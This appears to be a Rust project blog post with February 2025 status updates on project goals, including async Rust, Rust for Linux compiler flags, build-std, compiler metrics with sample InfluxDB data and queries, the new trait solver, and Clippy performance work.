What has happened? The biggest news is that Rust 1.85 is stable and includes two major features that impact Async Rust. The first is async closures, which has been on many people's wish lists for a long time and was expertly moved forward by @compiler-errors over the last year.

The second feature included in 1.85 is the new lifetime capture rules as part of Rust 2024 edition. This should substantially improve the experience of using async Rust anytime a user writes -> impl Future, as it removes the need for + '_ or similar bounds in most cases. It will also lead to an easier to understand language, since those bounds only worked by exploiting the more subtle rules of impl Trait in a way that runs contrary to their actual semantic role in the language. In the 2024 Edition, the subtle rule is gone and we capture all input lifetimes by default, with the ability to use + use<> syntax to opt out. See this blog post for more.

Generators. The lang team also held a design meeting to review the design for generators, with the outcome of the last one being that we will implement a std::iter::iter! macro (exact path TBD) in the compiler, as a lang team experiment that allows the use of the yield syntax. We decided to go in this direction because we want to reserve gen for self-borrowing and perhaps lending generators, and aren't yet decided on which subset of features to expose under that syntax. This decision interacts with ongoing compiler development that isn't ready yet to enable experimentation with lending.

Our hope is that in the meantime, by shipping iter! we will give people the chance to start using generators in their own code and better understand which limitations people hit in practice.

As you may have noticed, I'm not talking about async generators here. Those are the ultimate goal for the async initiative, but we felt the first step should be clarifying the state of synchronous generators so we can build on that when talking about async ones.

Dynosaur. dynosaur v0.1.3 was released, with another release in the works. We think we are approaching a 1.0 release real soon now (tm). At this point you should be able to try it on your crate to enable dyn dispatch for traits with async fn and other -> impl Trait methods. If you need to use it together with #[trait_variant], you may need to wait until the next release when #55 is fixed.

1 detailed update available.

Comment by @tmandry posted on 2025-02-26:

Rust 1.85

The first update is the release of Rust 1.85, which had at least two major features that impact Async Rust. The first is async closures, which has been on many people's wish lists for a long time and was expertly moved forward by @compiler-errors over the last year.

The second is the new lifetime capture rules as part of Rust 2024 edition. This should substantially improve the experience of using async Rust anytime a user writes -> impl Future, as it removes the need for + '_ or similar bounds in most cases. It will also lead to an easier to understand language, since those bounds only worked by exploiting the more subtle rules of impl Trait in a way that runs contrary to their actual semantic role in the language. In the 2024 Edition, the subtle rule is gone and we capture all input lifetimes by default, with the ability to use + use<> syntax to opt out. See this blog post for more.

Generators

The lang team held two design meetings on generators, with the outcome of the last one being that we will implement a std::iter::iter! macro (exact path TBD) in the compiler, as a lang team experiment that allows the use of the yield syntax. We decided to go in this direction because we want to reserve gen for self-borrowing and perhaps lending generators, and aren't yet decided on which subset of features to expose under that syntax. This decision interacts with ongoing compiler development that isn't ready yet to enable experimentation with lending.

Our hope is that in the meantime, by shipping iter! we will give people the chance to start using generators in their own code and better understand which limitations people hit in practice.

As you may have noticed, I'm not talking about async generators here. Those are the ultimate goal for the async initiative, but we felt the first step should be clarifying the state of synchronous generators so we can build on that when talking about async ones.

dynosaur

dynosaur v0.1.3 was released, with another release in the works. We think we are approaching a 1.0 release real soon now (tm). At this point you should be able to try it on your crate to enable dyn dispatch for traits with async fn and other -> impl Trait methods. If you need to use it together with #[trait_variant], you may need to wait until the next release when #55 is fixed.

Other

The async project goal was accepted for 2025H1!


Why this goal? May 15, 2025 marks the 10-year anniversary of Rust's 1.0 release; it also marks 10 years since the creation of the Rust subteams. At the time there were 6 Rust teams with 24 people in total. There are now 57 teams with 166 people. In-person All Hands meetings are an effective way to help these maintainers get to know one another with high-bandwidth discussions. This year, the Rust project will be coming together for RustWeek 2025, a joint event organized with RustNL. Participating project teams will use the time to share knowledge, make plans, or just get to know one another better. One particular goal for the All Hands is reviewing a draft of the Rust Vision Doc, a document that aims to take stock of where Rust is and lay out high-level goals for the next few years.

What has happened? Planning is proceeding well. In addition to Rust maintainers, we are inviting all project goal owners to attend the All Hands (note that the accompanying RustWeek conference is open to the public, it's just the All Hands portion that is invitation only). There are currently over 100 project members signed up to attend.

For those invited to the All Hands:

  • Travel funds may be available if you are unable to finance travel through your employer. Get in touch for details.
  • Please participate in the brainstorm for how best to use the All Hands time in the all-hands-2025 Zulip stream.
  • If you do plan to attend, please purchase your travel + hotels in a timely fashion as the discount rates will expire.
1 detailed update available.

Comment by @m-ou-se posted on 2025-02-28:

What happened so far:

  • Allocated a budget for the event.
  • Funds have been transferred from the Rust Foundation to RustNL.
  • Booked the venue, including lunch and snacks.
  • Remaining budget from last year's travel grant programme added to this year's, to help cover the travel costs.
  • Announcement published: https://blog.rust-lang.org/inside-rust/2024/09/02/all-hands.html
  • After sending many reminders to teams and individuals, about 110 project members signed up. (And a few cancelled.)
  • Formal invitations sent out to all those who registered.
  • Information on the all-hands: https://rustweek.org/all-hands/
  • Hotel reservations available: https://rustweek.org/hotels-all-hands/
  • Created a public and a private zulip channel.
  • About 65 people confirmed they booked their hotel.
  • Opened up discussion on what to discuss at the all-hands.
  • Invited guests: project goal (task) owners who aren't a project member (12 people in total). 4 of those signed up so far.
  • Acquired 150 secret gifts for the pre-all-hands day.

Next up:

  • Remind folks to get a ticket for the RustWeek conference (tuesday+wednesday) if they want to join that as well.
  • Invite more guests, after deciding on who else to invite. (To be discussed today in the council meeting.)
  • Figure out if we can fund the travel+hotel costs for guests too. (To be discussed today in the council meeting.)
  • Organise all the ideas for topics at the all-hands, so we can turn them into a consistent schedule later.
  • Draft an allocation of the rooms depending on the teams and topics.
  • Open the call for proposals for talks for the Project Track (on wednesday) as part of the RustWeek conference.

Why this goal? This goal continues our work from 2024H2 in supporting the experimental support for Rust development in the Linux kernel. Whereas in 2024H2 we were focused on stabilizing required language features, our focus in 2025H1 is stabilizing compiler flags and tooling options. We will (1) implement RFC #3716 which lays out a design for ABI-modifying flags; (2) take the first step towards stabilizing build-std by creating a stable way to rebuild core with specific compiler options; (3) extending rustdoc, clippy, and the compiler with features that extract metadata for integration into other build systems (in this case, the kernel's build system).

What has happened? We established the precise set of 2025H1 deliverables and we have been tracking them and have begun making progress towards them. Rustdoc has been updated to support extracting doc tests so that the Kernel can execute them in a special environment (this was previously done with a big hack) and RFL is in the process of trying to use that new support. The first PR towards the implementation of RFC #3716 has landed and the ARM team has begun reading early drafts of the design doc for -Zbuild-core with the cargo team.

We are also working to finalize the stabilization of the language features that were developed in 2024H2, as two late-breaking complications arose. The first (an interaction between casting of raw pointers and arbitrary self types) is expected to be resolved by limiting the casts of raw pointers, which previously accepted some surprising code. We identified that only a very small set of crates relied on this bug/misfeature; we expect nonetheless to issue a forwards compatibility warning. We are also resolving an issue where derive(CoercePointee) was found to reveal the existence of some unstable impls in the stdlib.

3 detailed updates available.

Comment by @nikomatsakis posted on 2025-01-15:

In our meeting today we reviewed the plans for the 2025H1 project goal...

"Almost done" stuff from before

  • re-stabilize CoercePointee -- Alice is looking at this, it's a good opportunity to try out the new template that is being discussed
  • stabilize arbitrary self types v2 -- @adetaylor left a comment 3 weeks ago indicating that everything was more-or-less landed. RFL is already using it, providing evidence that it works reasonably well. Next steps are then sorting out documentation and moving to stabilize.
  • asm-goto -- ready for stabilization, not been merged yet, still doing some work on the Rust reference (PRs https://github.com/rust-lang/rust/pull/133870, https://github.com/rust-lang/reference/pull/1693)

ABI-modifying flags

The rust-lang/rfcs#3716 is now in Final Comment Period (FCP). There is a preliminary implementation in #133138 that @petrochenkov is going to be reviewing. Some more work will be needed to test, cleanup, etc after that lands.

Other flags from RFL#2

We went through a series of flags that RFL uses and looked into what might be blocking each of them. The process to stabilize one of these is basically to prepare the stabilization PR (minimal, but we need to rename the flag from -Z to -C) with a stabilization report and proper docs and then cc @davidtwco or @wesleywiser to prepare stabilization. In most cases we need to document how the flags can be misused, most commonly by linking against std or other crates not built with the same flags. If there are major correctness concerns as a result we likely want to consider the flag as "ABI-modifying".

  • ability to extract dependency info, currently using -Zbinary_dep_depinfo=y -- basically ready to stabilize
    • tmandry: Do you want toolchain runtimes (libstd, compiler-rt) in your dep info? In my experience this feature does 90% of what I want it to do, but removing the inclusion of runtimes is the only question I have before stabilizing.
  • -Zcrate-attr, used to configure no-std without requiring it in the source file -- no real concerns
  • -Zunpretty=expanded -- have to clearly document that the output is not stable, much like we did for emitting MIR. This is already "de facto" stable because in practice cargo expand uses RUSTC_BOOTSTRAP=1 and everybody uses it.
  • -Zno-jump-tables -- this should be considered an ABI-modifying flag because we believe it is needed for CFI and therefore there is a risk if incompatible modules are linked.
  • -Zdwarf-version, -Zdebuginfo-compression -- this should be ready to stabilize, so long as we document that you should expect a mix of debuginfo etc when mixing things compiled with different versions (notably libstd, which uses DWARF4). Debuggers are already prepared for this scenario. zstd compression is supported as of Rust 1.82.0.

stable rustdoc features allowing the RFL project to extract and customize rustdoc tests (--extract-doctests)

@imperio authored https://github.com/rust-lang/rust/pull/134531, which is now up for review. Once PR lands, RFL will validate the design, and it can proceed to stabilization.

clippy configuration (possibly .clippy.toml and CLIPPY_CONF_DIR)

We discussed with clippy team, seems like this is not a big deal, mostly a doc change, one concern was whether clippy should accept options it doesn't recognize (because they may come from some future version of clippy). Not a big deal as of now, RFL only uses (msrv, check-private-items=true, disallowed-macros).

rebuild libcore

ARM team is working on this as part of this project goal, expect updates. 🎉

Comment by @nikomatsakis posted on 2025-01-30:

Updates:

2024H2 cleanup

  • Arbitrary self types v2: Stabilization PR is open (rust-lang/rust#135881).
  • Stabilize CoercePointee: RFL is using it now; we are making progress towards completing the stabilization.

2025H1

  • ABI-modifying flags RFC (rust-lang/rfcs#3716) has completed FCP and needs to be merged. Implementation PR #133138 authored by @azhogin remains under review.
  • Other compiler flags: we made a prioritized list. One easy next step would be to rename all -Z flags in this list to something stabilizable (e.g., -C) that requires -Zunstable-features.
    • [ ] -Zdwarf-version -- wesley wiser
    • [ ] -Zdebuginfo-compression, unblocked
    • [ ] -Zcrate-attr, used to configure no-std without requiring it in the source file, no real concerns
    • [ ] -Zunpretty=expanded, unblocked; maybe needs a PR that says "don't rely on this". Linux only uses it for debugging macros (i.e. not in the normal build, so it is less critical). It needs a stable name, e.g. --emit macro-expanded, and we should make sure the output cannot be piped back into rustc. The rustfmt team told us (Rust for Linux) that they will try their best to keep rustfmt able to format the output of the expansion. (An illustrative invocation follows this list.)
    • [ ] -Zno-jump-tables, considered an ABI-modifying flag
    • [ ] -Zbinary_dep_depinfo=y -- basically ready to stabilize (@tmandry asked "Do you want toolchain runtimes (libstd, compiler-rt) in your dep info? In my experience this feature does 90% of what I want it to do, but removing the inclusion of runtimes is the only question I have before stabilizing", but we don't understand this point yet, as they were not present in the meeting).
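For reference, the current "de facto stable" usage of -Zunpretty looks roughly like this (a hypothetical invocation on a local file; src/lib.rs is a placeholder, and cargo expand wraps essentially the same mechanism):

# Print the macro-expanded source of a crate root; the output format is not stable.
RUSTC_BOOTSTRAP=1 rustc -Zunpretty=expanded --edition=2021 src/lib.rs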
  • stable rustdoc: PR rust-lang/rust#134531 is under review, should land soon, then next step will be for RFL folks to try it out.
  • Clippy configuration: no progress, discussed some new options and posted in thread, very minimal work required here.
  • rebuild libcore: @davidtwco wasn't present so no update, but we know progress is being made

Publicizing this work

We discussed briefly how to better get the word out about this collaboration. Some points:

  • @Darksonn will be speaking at Rust Nation
  • We could author a Rust-lang blog post, perhaps once the language items are done done done?
  • LWN article might be an option

general-regs-only

We discussed the possibility of a flag to avoid use of floating point registers, no firm conclusion yet reached.

Comment by @nikomatsakis posted on 2025-02-20:

Updates from our 2025-02-12 meeting:

Given the recent controversy about Rust usage in the Kernel, the RFL group wrote up a document explaining their policy, and there was a write-up on LWN.

Regarding arbitrary self types and coerce pointee, we are waiting on rust-lang/rust#136764 and rust-lang/rust#136776. The former is on lang team FCP. The latter has received approval from lang team and is awaiting further impl work by @BoxyUwU.

@ojeda is looking into how to manage dependency information and configure no-std externally.

@GuillaumeGomez's impl of rustdoc features has landed and we are waiting on RFL to experiment with it.

@davidtwco's team at ARM has authored a document regarding a blessed way to build-std and are collecting feedback.

@wesleywiser is preparing a PR to add -Zdwarf-version to help advance compiler flags.

There is an annoying issue related to cfg(no_global_oom_handling), which is no longer used by RFL but which remains in an older branch of the kernel (6.12, LTS).

As a set of "leaf crates" that evolve together in a mono-repo-like fashion, RFL would like to have a solution for disabling the orphan rule.


Goals looking for help

Help wanted: this project goal needs a compiler developer to move forward. If you'd like to help, please post in this goal's dedicated zulip topic.

1 detailed update available.

Comment by @epage posted on 2025-02-20:

Help wanted: this project goal needs a compiler developer to move forward.


Help wanted: this project goal needs someone to work on the implementation. If you'd like to help, please post in this goal's dedicated zulip topic.

2 detailed updates available.

Comment by @epage posted on 2025-02-20:

Help wanted: this project goal needs someone to work on the implementation

Comment by @ashiskumarnaik posted on 2025-02-23:

Hi @epage, I am very interested in collaborating on this implementation work. Let's talk on Zulip; check your DMs.


Help wanted: looking for people that want to help do a bit of refactoring. Please reach out through the project-stable-mir zulip channel or repository.

1 detailed update available.

Comment by @celinval posted on 2025-02-25:

No progress yet.

Help Wanted: Looking for people that want to help do a bit of refactoring. Please reach out through the project-stable-mir zulip channel or repository.


Help wanted: this project goal needs a compiler developer to move forward. If you'd like to help, please post in this goal's dedicated zulip topic.

1 detailed update available.

Comment by @epage posted on 2025-02-20:

Help wanted: this project goal needs a compiler developer to move forward.


Other goal updates

1 detailed update available.

Comment by @BoxyUwU posted on 2025-02-27:

camelid has a PR up which is ~fully finished and reviewed; it enables resolving and lowering all paths under min_generic_const_args. It's taken a while to get this bit finished, as we had to take care not to make parts of the compiler unmaintainable by duplicating all the logic for type and const path lowering.

1 detailed update available.

Comment by @davidtwco posted on 2025-02-19:

An initial update on what we've been up to and some background:

  • This goal is submitted on behalf of the Rust team at Arm, but primarily worked on by @AdamGemmell. Anyone interested can always contact me for updates and I'll keep this issue up-to-date.
  • Our team has been trying to make progress on build-std by completing the issues in rust-lang/wg-cargo-std-aware but found this wasn't especially effective as there wasn't a clearly defined scope or desired outcome for most issues and the relevant teams were lacking in the necessary context to evaluate any proposals.
  • We've since had discussions with the Cargo team and agreed to draft a document describing the use cases, motivations and prior art for build-std such that the Cargo team can feel confident in reviewing any further proposals.
    • @AdamGemmell shared an initial draft of this in #t-cargo on Zulip and it is undergoing further revisions following feedback.
    • Following reaching a shared understanding of the context of the feature, @AdamGemmell will then draft a complete proposal for build-std that could feasibly be stabilised. It will describe the use cases which are and are not considered in-scope for build-std, and which will feature in an initial implementation.
  • @davidtwco is ensuring that whatever mechanism that is eventually proposed to enable build-std to work on stable toolchains will also be suitable for the Rust for Linux project to use when building core themselves.
1 detailed update available.

Comment by @obi1kenobi posted on 2025-02-19:

Thanks, Niko! Copying in the new tasks from the 2025h1 period:

  • [ ] Prototype cross-crate linting using workarounds (@obi1kenobi)
  • [ ] Allow linting generic types, lifetimes, bounds (@obi1kenobi)
  • [ ] Handle "special cases" like 'static and ?Sized (@obi1kenobi)
  • [ ] Handle #[doc(hidden)] in sealed trait analysis (@obi1kenobi)
  • [x] Discussion and moral support (cargo, rustdoc)
No detailed updates available.
1 detailed update available.

Comment by @tmandry posted on 2025-02-26:

We had a lang team design meeting about C++ interop today. The outcome was very positive, with enthusiasm for supporting an ambitious vision of C++ interop: One where a large majority of real-world C++ code can have automated bindings to Rust and vice-versa.

At the same time, the team expressed a desire to do so in a way that remains in line with Rust's values. In particular, we would not make Rust a superset of Rust+C++, but instead would define extension points that can be used to express language interop boundaries that go beyond what Rust itself allows. As an example, we could allow template instantiation via a Rust "plugin" without adding templates to Rust itself. Similarly, we could allow calling overloaded C++ methods without adding function overloading to Rust itself. Other interop needs are more natural to enable with features in the Rust language, like custom reference types.

In either case, anything we do to support interop will need to be considered on its merits. Interop is a reason to support a feature, but it is never a "blank check" to add anything we might consider useful.

The discussion so far has been at a high level. Next steps will be:

  • Discuss what significant-but-realistic milestones we might pursue as part of upcoming project goals, and what it would take to make them happen. Whether this happens as part of another lang team meeting or a more dedicated kickoff meeting for interested parties, I'll be sure to keep the lang team in the loop and will continue posting updates here.
  • Dive into more specific proposals for use cases we would like to enable in meetings with the language, library, and compiler teams.

Notes: https://hackmd.io/2Ar_7CNoRkeXk1AARyOL7A?view

1 detailed update available.

Comment by @spastorino posted on 2025-02-26:

There's a PR up (https://github.com/rust-lang/rust/pull/134797) which implements the proposed RFC without the optimizations. The PR is not yet merged; we need to keep addressing review comments until it is merged, and then start implementing the optimizations.

1 detailed update available.

Comment by @ZuseZ4 posted on 2025-01-03:

Happy New Year everyone! After a few more rounds of feedback, the next autodiff PR recently got merged: https://github.com/rust-lang/rust/pull/130060 With that, I only have one last PR open to have a fully working autodiff MVP upstream. A few features had to be removed during upstreaming to simplify the reviewing process, but they should be easier to bring back as single PRs.

Beginning next week, I will also work on an MVP for the batching feature of LLVM/Enzyme, which enables some AoS and SoA vectorization. It mostly re-uses the existing autodiff infrastructure, so I expect the PRs for it to be much smaller.

On the GPU side, there has been a recent push by another developer to add a new AMD GPU target to the Rust compiler. This is something that I would have needed for the llvm offload project anyway, so I'm very happy to see movement here: https://github.com/rust-lang/compiler-team/issues/823

1 detailed update available.

Comment by @Eh2406 posted on 2025-02-26:

The major update so far is the release of PubGrub 0.3. This makes available the critical improvements made to allow the functionality and performance demanded by Cargo and UV. The other production users can now take advantage of the past few years of improvements. Big thanks to @konstin for making the release happen.

Other progress has been stymied by being sick with Covid for a week in January and the resulting brain fog, followed by several high-priority projects for $DAY_JOB. It is unclear when the demands of work will allow me to return focus to this project.

1 detailed update available.

Comment by @m-ou-se posted on 2025-02-28:

Now that https://github.com/rust-lang/rust/pull/135726 is merged, @jdonszelmann and I will be working on implementing EII.

We have the design for the implementation worked out on our whiteboard. We don't expect any significant blockers at this point. We'll know more once we start writing the code next week.

1 detailed update available.

Comment by @epage posted on 2025-02-20:

This is on pause until the implementation for #92 is finished. The rustc side of #92 is under review; after that, some additional rust-analyzer and cargo work remains before the implementation is done, and then it is waiting on testing and stabilization.

1 detailed update available.

Comment by @jhpratt posted on 2025-02-26:

First status update:

No progress. I will be reviewing the existing PR this weekend to see the feasibility of rebasing it versus reapplying patches by hand. My suspicion is that the latter will be preferable.

1 detailed update available.

Comment by @traviscross posted on 2025-02-26:

This is, I believe, mostly waiting on us on the lang team to have a look, probably in a design meeting, to feel out what's in the realm of possibility for us to accept.

1 detailed update available.

Comment by @celinval posted on 2025-01-03:

Key developments: We have written and verified around 220 safety contracts in the verify-rust-std fork. 3 out of 14 challenges have been solved. We have successfully integrated Kani in the repository CI, and we are working on the integration of 2 other verification tools: VeriFast and Goto-transcoder (ESBMC).

2 detailed updates available.

Comment by @jieyouxu posted on 2025-02-19:

Update (2025-02-19):

  • To make it easier to follow bootstrap's test flow going into running compiletest-managed test suites, I've added more tracing to bootstrap in https://github.com/rust-lang/rust/pull/137080.
  • There are some prerequisite cleanups/improvements that I'm working on first to make it easier to read bootstrap + compiletest's codebase for reference: https://github.com/rust-lang/rust/pull/137224, https://github.com/rust-lang/rust/pull/136474, https://github.com/rust-lang/rust/pull/136542
  • I'm thinking for the prototype I'm going to experiment with a branch off of rust-lang/rust instead of completely separately, so I can experiment under the context of bootstrap and tests that we actually have, instead of trying to experiment with it in a complete vacuum (esp. with respect to staging and dependency licenses).

Comment by @jieyouxu posted on 2025-02-27:

Update (2025-02-27):

  • Cleanups still waiting to be merged (some PRs are blocked on changes from others making this slow).
2 detailed updates available.

Comment by @yaahc posted on 2025-02-25:

I'm very excited to see that this got accepted as a project goal 🥰 🎉

Let me go ahead and start by giving an initial status update of where I'm at right now.

  • We've already landed the initial implementation for configuring the directory where metrics should be stored which also acts as the enable flag for a default set of metrics, right now that includes ICE reports and unstable feature usage metrics
  • Implemented basic unstable feature usage metrics, which currently dump a json file per compiled crate showing which unstable features are enabled (example below).
  • Implemented rust-lang/rust/src/tools/features-status-dump which dumps the status information for all unstable, stable, and removed features as a json file
    • set up an extremely minimal initial proof-of-concept implementation locally on my laptop using InfluxDB 3.0 Alpha and Grafana (image below)
    • I have a small program I wrote that converts the json files into influxdb's line protocol for both the usage info and the status info (snippets shown below)
      • The timestamps are made up, since they all need to be distinct or else influxdb will treat them all as updates to the same row. I'd like to preserve this information from when the metrics were originally dumped, either in the json or by changing rustc to dump via influxdb's line format directly, or some equivalent protocol. (Note this is probably only necessary for the usage metrics; for the status metrics I'd have to change the line format schema from the example below to avoid the same problem. This has to do with how influxdb treats tags vs fields.)
    • I gathered a minimal dataset by compiling rustc with RUSTFLAGS_NOT_BOOTSTRAP="-Zmetrics-dir=$HOME/tmp/metrics" ./x build --stage 2 and ./x run src/tools/features-status-dump/, saving the output to the filesystem, and converting it to the line protocol with the aforementioned program.
    • Wrote the two resulting files to influxdb.
    • I then set up the table two different ways: once by directly querying the database using influxdb's cli (query shown below), then again by trying to set up an equivalent query in Grafana (there are definitely some kinks to work out here; I'm not an expert on Grafana by any means).

from unstable_feature_usage_metrics-rustc_hir-3bc1eef297abaa83.json

{"lib_features":[{"symbol":"variant_count"}],"lang_features":[{"symbol":"associated_type_defaults","since":null},{"symbol":"closure_track_caller","since":null},{"symbol":"let_chains","since":null},{"symbol":"never_type","since":null},{"symbol":"rustc_attrs","since":null}]}

Image

Snippet of unstable feature usage metrics post conversion to line protocol

featureUsage,crateID="bc8fb5c22ba7eba3" feature="let_chains" 1739997597429030911
featureUsage,crateID="439ccecea0122a52" feature="assert_matches" 1739997597429867374
featureUsage,crateID="439ccecea0122a52" feature="extract_if" 1739997597429870052
featureUsage,crateID="439ccecea0122a52" feature="iter_intersperse" 1739997597429870855
featureUsage,crateID="439ccecea0122a52" feature="box_patterns" 1739997597429871639

Snippet of feature status metrics post conversion to line protocol

featureStatus,kind=lang status="unstable",since="1.5.0",has_gate_test=false,file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/unstable.rs",line=228,name="omit_gdb_pretty_printer_section" 1739478396884006508
featureStatus,kind=lang status="accepted",since="1.83.0",has_gate_test=false,tracking_issue="123742",file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/accepted.rs",line=197,name="expr_fragment_specifier_2024" 1739478396884040564
featureStatus,kind=lang status="accepted",since="1.0.0",has_gate_test=false,file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/accepted.rs",line=72,name="associated_types" 1739478396884042777
featureStatus,kind=lang status="unstable",since="1.79.0",has_gate_test=false,tracking_issue="123646",file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/unstable.rs",line=232,name="pattern_types" 1739478396884043914
featureStatus,kind=lang status="accepted",since="1.27.0",has_gate_test=false,tracking_issue="48848",file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/accepted.rs",line=223,name="generic_param_attrs" 1739478396884045054
featureStatus,kind=lang status="removed",since="1.81.0",has_gate_test=false,tracking_issue="83788",file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/removed.rs",line=245,name="wasm_abi" 1739478396884046179

Run with influxdb3 query --database=unstable-feature-metrics --file query.sql

SELECT
  COUNT(*) TotalCount, "featureStatus".name
FROM
  "featureStatus"
INNER JOIN "featureUsage" ON
  "featureUsage".feature = "featureStatus".name
GROUP BY
  "featureStatus".name
ORDER BY
    TotalCount DESC
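For context, here is a minimal sketch of the kind of json-to-line-protocol conversion program described above. It is an illustration rather than the actual tool: it assumes serde_json as a dependency, hardcodes the crate ID (which in the real dumps comes from the file name), and synthesizes nanosecond timestamps purely to keep rows distinct, as noted in the caveat above.

// Convert an unstable_feature_usage_metrics-*.json dump into InfluxDB line protocol.
use std::time::{SystemTime, UNIX_EPOCH};

fn main() -> Result<(), Box<dyn std::error::Error>> {
    let path = std::env::args().nth(1).expect("usage: convert <metrics.json>");
    // In the real dumps the crate ID is part of the file name; hardcoded here for brevity.
    let crate_id = "bc8fb5c22ba7eba3";
    let json: serde_json::Value = serde_json::from_str(&std::fs::read_to_string(&path)?)?;
    // Synthetic timestamps, bumped per row so influxdb does not collapse rows
    // into updates of the same point (see the caveat above).
    let mut ts = SystemTime::now().duration_since(UNIX_EPOCH)?.as_nanos();
    for key in ["lib_features", "lang_features"] {
        for feature in json[key].as_array().into_iter().flatten() {
            if let Some(symbol) = feature["symbol"].as_str() {
                println!("featureUsage,crateID=\"{crate_id}\" feature=\"{symbol}\" {ts}");
                ts += 1;
            }
        }
    }
    Ok(())
}

Fed the json file shown above, this prints rows shaped like the featureUsage snippet; the featureStatus records would need a slightly different schema, as discussed in the follow-up comment.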

Comment by @yaahc posted on 2025-02-25:

My next step is to revisit the output format, which is currently a direct json serialization of the data as it is represented internally within the compiler. This has already proven to be inadequate, both from personal experience (given the need for additional ad-hoc conversion into another format with faked timestamp data that wasn't present in the original dump) and from a conversation with @badboy (Jan-Erik), where he recommended we explicitly avoid ad-hoc definitions of telemetry schemas, which can lead to difficult-to-manage chaos.

I'm currently evaluating what options are available to me, such as a custom system built around influxdb's line format, or opentelemetry's metrics API.

Either way, I want to use Firefox's telemetry system as inspiration and a basis for requirements when evaluating the output format options.

Relevant notes from my conversation w/ Jan-Erik

  • firefox telemetry starts w/ the question, what is it we want to answer by collecting this data? has to be explicitly noted by whoever added new telemetry, there's a whole process around adding new telemetry
    • defining metric
    • description
    • owner
    • term limit (expires automatically, needs manual extension)
    • data stewards
      • do data review
      • checks that telemetry makes sense
      • check that everything adheres to standards
    • can have downside of increasing overhead to add metrics
    • helps w/ tooling, we can show all this info as documentation
    • schema is generated from definitions
1 detailed update available.

Comment by @nikomatsakis posted on 2025-02-26:

I have established some regular "office hour" time slots where I am available on jitsi. We landed a few minor PRs and improvements to the parser and oli-obk and tif have been working on modeling of effects for the const generics work. I'm planning to start digging more into the modeling of coherence now that the basic merging is done.

1 detailed update available.

Comment by @lcnr posted on 2025-02-27:

We've stabilized -Znext-solver=coherence in version 1.84 and started to track the remaining issues in a project board.

Fixing the opaque types issue breaking wg-grammar is difficult and requires a more in-depth change for which there is now an accepted Types MCP. This likely also unblocks the TAIT stabilization using the old solver.

While waiting on the MCP I've started to look into the errors when compiling nalgebra. @lqd minimized the failures. They have been caused by insufficiencies in our cycle handling. With https://github.com/rust-lang/rust/pull/136824 and https://github.com/rust-lang/rust/pull/137314 cycles should now be fully supported.

We also fully triaged all UI tests with the new solver enabled with @compiler-errors, @BoxyUwU, and myself fixing multiple less involved issues.

1 detailed update available.

Comment by @veluca93 posted on 2025-02-25:

Key developments: Further discussions on implementation details of the three major proposed ways forward. Requested a design meeting in https://github.com/rust-lang/lang-team/issues/309.

1 detailed update available.

Comment by @1c3t3a posted on 2025-02-19:

Status update: The null-checks landed in rust#134424. Next up are the enum discriminant checks.

1 detailed update available.

Comment by @blyxyas posted on 2025-02-26:

As a monthly update (previously posted on Zulip): We have some big progress!

  • rust-clippy#13821 has been opened and is currently being reviewed. It moves the MSRV logic out of lint-individualistic attribute extraction and into a Clippy-wide MSRV (with a very good optimization, taking into account that only a small percentage of crates use an MSRV).

  • A Clippy-exclusive benchmarker has arrived, powered by the existing lintcheck infrastructure and perf, so it's compatible with flamegraph and other such tools (rust-clippy#14194). We can later expand this into CI or a dedicated bot.

  • As you probably know, rust#125116 has been merged, just as a reminder of how that big goal was slayed like a dragon :dragon:.

We now know what functions to optimize (or at least have a basic knowledge of where Clippy spends its time). As some future functionality, I'd love to be able to build cargo and rust with debug symbols and hook it up to Clippy, but that may be harder. It's not perfect, but it's a good start!

clippy benchmark perf.data report

No detailed updates available.
No detailed updates available.
1 detailed update available.

Comment by @JoelMarcey posted on 2025-02-24:

Last week at the Safety Critical Rust Consortium meeting in London, Ferrous Systems publicly announced to consortium members that they have committed to contributing the FLS to the Rust Project. We are finalizing the details of that process, but we can start FLS integration testing in parallel, in anticipation.

2 detailed updates available.

Comment by @m-ou-se posted on 2025-02-28:

We started the collaboration with the Delft University of Technology. We assembled a small research team with a professor and an MSc student who will be working on this as part of his MSc thesis. We meet weekly in person.

The project kicked off two weeks ago and is now in the literature research phase.

Comment by @m-ou-se posted on 2025-02-28:

And related to this, someone else is working on an implementation of my #[export] rfc: https://github.com/rust-lang/rust/pull/134767 This will hopefully provide meaningful input for the research project.

1 detailed update available.

Comment by @nikomatsakis posted on 2025-02-19:

Update: We are running behind schedule, but we are up and running nonetheless! Bear with us. The goals RFC finished FCP on Feb 18. The new project goals team has been approved and we've updated the tracking issues for the new milestone.

Project goal owners are encouraged to update the issue body to reflect the actual tasks as they go with github checkboxes or other notation as described here. We're going to start pinging for our first status update soon!

1 detailed update available.

Comment by @nikomatsakis posted on 2025-02-19:

Update so far: I put out a call for volunteers on Zulip (hackmd) and a number of folks responded. We had an initial meeting on Jan 30 (notes here). We have created a Zulip stream for this project goal (vision-doc-2025) and I also did some experimenting in the https://github.com/nikomatsakis/farsight repository for what the table of contents might look like.

The next milestone is to lay out a plan. We are somewhat behind schedule but not impossibly so!

Believe!

1 detailed update available.

Comment by @davidtwco posted on 2025-02-19:

An initial update on what we've been up to and some background:

  • This goal is submitted on behalf of the Rust team at Arm, but primarily worked on by @Jamesbarford. Anyone interested can always contact me for updates and I'll keep this issue up-to-date.
  • We've scheduled a regular call with @Kobzol to discuss the constraints and requirements of any changes to rust-perf (see the t-infra calendar) and have drafted a document describing a proposed high-level architecture for the service following our changes.
    • This has been shared in the #project-goals/2025h1/rustc-perf-improvements Zulip channel to collect feedback.
    • Once we've reached an agreement on the high-level architecture, we'll prepare a more detailed plan with details like proposed changes to the database schema, before proceeding with the implementation.
1 detailed update available.

Comment by @lqd posted on 2025-01-31:

Key developments from this month:

  • @amandasystems has continued working on the Sisyphean https://github.com/rust-lang/rust/pull/130227 and has made progress on rewriting type tests, fixing diagnostics issues and bugs, keeping up with changes on master, and more.
  • big thanks to @jackh726 and @matthewjasper on reviews: with their help, all the PRs from the previous update have landed on nightly.
  • I've opened a couple of PRs on the analysis itself (https://github.com/rust-lang/rust/pull/135290, https://github.com/rust-lang/rust/pull/136299) as well as a few cleanups. With these, there are only around 4 failing tests that still need investigation, and 8-10 diagnostics differences to iron out. This is my current focus, but we'll also need to expand test coverage.
